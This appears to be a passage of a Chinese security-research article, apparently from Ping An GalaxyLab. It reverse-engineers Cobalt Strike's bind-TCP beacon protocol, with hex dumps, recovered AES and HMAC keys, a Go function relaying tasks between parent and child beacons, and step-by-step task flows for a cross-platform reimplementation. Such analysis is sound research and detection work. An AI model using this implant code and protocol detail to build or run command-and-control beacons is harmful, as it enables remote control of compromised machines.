8c88a911b378ae080810e239c43e52e09f294e7e445f5c4178bb809c887631c3c86faa8e4a8ed435 db34b2c7df9ee05b6a54c648c60d9d464f7476e16a578d0a54040b4c5abc4f23846716da3fd90736 ee8d5015220ca48c66c8bb0e73f7b0f525161e82fec27789cace323577ffc5f266128e628a0c5155 955f1786576fd1668c6fb83c0999d285306a5ed6d2e8d69df636cf917e220ba7881a69f5a313abeb 0125e00f49f59a1c5bd23443d1c4824bdc486af863b67e936a876d86ad2062141c1b2c30c3d5444a c92f4b8c9949bfdbb7ce1fe0


3. 根据上线源数据获取aeskey和hashmac



子beacon发送给父beacon的上线源数据包为:

5e85aa3106755b9156b8f3b04fa0da72dc3740465cc0d2f45c5dd3d3d6a7496f397892c5dc5b11d7 602419647d177b5563a952f10c395c385832fedeebd119a89a3b77c32d62bf19c44f75836ab0a20e 200eaec1aace752a0690d9284b5da6402e3034f09fbc568b684e793d9983cf8601cd309bdcaa273e 6fadd95081508147f95fd914


按照我们上面的分析,还需要删除前面4字节的反序beaconid才是真正的上线源数据:

06755b9156b8f3b04fa0da72dc3740465cc0d2f45c5dd3d3d6a7496f397892c5dc5b11d760241964 7d177b5563a952f10c395c385832fedeebd119a89a3b77c32d62bf19c44f75836ab0a20e200eaec1 aace752a0690d9284b5da6402e3034f09fbc568b684e793d9983cf8601cd309bdcaa273e6fadd950 81508147f95fd914


然后使用解密源数据的python脚本解密:



获得AES key和Hashmac

AES key:9b933592951d47b2ae93e339b640e92d HMAC key:8fa971e3d5950a7ff0d5f4fca898c8ae


4. 根据bindtcp beacon源数据获得aes key解密bindtcp beacon返回的任务数据



如上图,与我们cs执行命令返回的结果一致。


3.2.2 golang模拟发送请求

func BeaconLive(cmdBuf []byte)  {    childBID := binary.BigEndian.Uint32(cmdBuf)    value,ok := config.Connects.Load(childBID)    if ok{        childBeacon,ok := value.(config.ChildBeacon)        if ok{            childConn := childBeacon.ChildConn            if len(cmdBuf) == 4{                packet.WriteData(childConn, nil)            }else {                packet.WriteData(childConn, cmdBuf[4:])            }
            data,err := packet.ReadData(childConn)            if err!= nil{                if err.Error() == "EOF"{                    Unlink(cmdBuf[:4])                }else {                    finalPacket := packet.MakePacket(13,[]byte(err.Error()))                    packet.WriteData(config.ParentConn,finalPacket)                }            }else if data == nil { //心跳成功返回                childBIDBytes := util.Uint32ToBytes(childBID)                finalPacket := packet.MakePacket(12,childBIDBytes) //返回数据到上一层时添加子beaconid                packet.WriteData(config.ParentConn, finalPacket)            } else {                childBIDBytes := util.Uint32ToBytes(childBID)                endData := util.BytesCombine(childBIDBytes, data)//返回数据到上一层时添加子beaconid                finalPacket := packet.MakePacket(12,endData)                packet.WriteData(config.ParentConn, finalPacket)            }        }    }}



0x04 跨平台的bindtcp Beacon


根据上面的分析,我们总结出bindtcp流程如下:



4.1 子beacon的任务过程


1. 子beacon新建监听,初始化全局变量,比如:beaconid、AES key和HashMac等;然后等待父beacon连接。


2. 建立连接之后,子beacon获取源数据组包,并使用公钥加密,然后封包小端beaconid,最后使用自定义的tcp封包格式(长度包+数据包)发往父beacon。


3. 子beacon进入循环读取父beacon任务,任务分为:命令任务和心跳任务。


4. 子beacon判断收到心跳任务时,向父beacon返回0x00000000,表示在线;子beacon判断收到的是命令任务,会使用AES key解密命令,解析出实际命令分配对应的线程取执行。


5. 当命令执行线程执行完命令之后,将执行结果进行任务结果的封包:包括AES加密命令结果,封装结果长度,封装Hmac等;然后使用自定义的tcp封包格式(长度包+数据包)向父beacon发送命令执行结果。


4.2 父beacon的任务过程


1. 接收连接到子beacon的任务,判断是否已经连接,如果没有,则连接子beacon监听的端口。


2. 读取子beacon返回的源数据包,获取子beaconid,并将子beaconid、子beacon对应的ip、port、对应连接的tcp socket进行绑定。


3. 封包连接任务返回数据:大端beaconid+hint+rsa加密的子beacon源数据;然后再使用父beacon 的AES key加密源数据,并封装数据长度和父beacon的hashmac。


4. 如果父beacon是http/https beacon,会对应使用模拟http请求向ts发送父beacon的连接任务数据(即子beacon的上线源数据);如果父beacon是bind tcp beacon,会对应使用自定义的tcp封包格式(长度包+数据包)发往父beacon的父beacon。


5. 父beacon等待ts/上一级beaocn的任务,从解密的任务数据中获取子beaconid,然后根据子beacon ID获取对应的socket,最后使用对应的socket将数据发送到子beacon。


6. 然后等待子beacon返回命令执行数据,并封装上子beacon ID,然后再用父beaocn的AES key加 密,封装上数据长度和hashmac,最后发往ts/上一级beacon。


银河实验室

银河实验室(GalaxyLab)是平安集团信息安全部下一个相对独立的安全实验室,主要从事安全技术研究和安全测试工作。团队内现在覆盖逆向、物联网、Web、Android、iOS、云平台区块链安全等多个安全方向。
官网:http://galaxylab.pingan.com.cn/




往期回顾


技术

【平安CTF赛题】解题思路总结

技术

D-Link 816-A2 路由器研究分享

技术

使用Ghidra P-Code对OLLVM控制流平坦化进行反混淆

技术

家用路由器D-LINK DIR-81漏洞挖掘实例分析

公告

防守方视角看漏扫——手把手教你定制自己的漏扫框架(POC部分)


长按识别二维码关注我们

微信号:PSRC_Team



球分享

球点赞

球在看



关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

*文章为作者独立观点,不代表 爱尖刀 立场
本文由 平安安全应急响应中心发表,转载此文章须经作者同意,并请附上出处( 爱尖刀 )及本页链接。
原文链接 https://www.ijiandao.com/2b/baijia/423712.html
图库
平安安全应急响应中心 平安安全应急响应中心
公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接
百度热搜榜
排名 热点 搜索指数
iTrust
AiDeep Ued
关于我们 联系我们 升级日志 法律声明 广告服务 侵删通道
Copyright © 2021 K2CMS All rights reserved.
京ICP备14006288号